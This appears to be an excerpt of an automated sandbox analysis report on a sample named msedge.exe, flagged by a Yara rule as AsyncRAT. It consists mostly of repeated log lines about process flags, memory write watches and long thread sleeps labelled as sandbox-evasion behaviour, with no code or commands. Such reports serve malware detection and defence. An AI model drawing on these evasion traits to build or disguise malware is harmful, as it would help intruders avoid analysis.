Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\msedge.exe	Memory allocated: F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Memory allocated: 1A9D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1A430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: C80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1A730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 12C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1AEA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1AA20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1B200000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598713	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598607	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598482	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598157	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598032	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597907	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597782	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597657	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597532	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596283	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596163	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595909	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595612	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595470	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594907	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594407	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594282	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594172	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\msedge.exe	Window / User API: threadDelayed 3102			Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Window / User API: threadDelayed 6725			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598713s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598607s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598482s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596283s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596163s >= -30000s	Jump to behavior
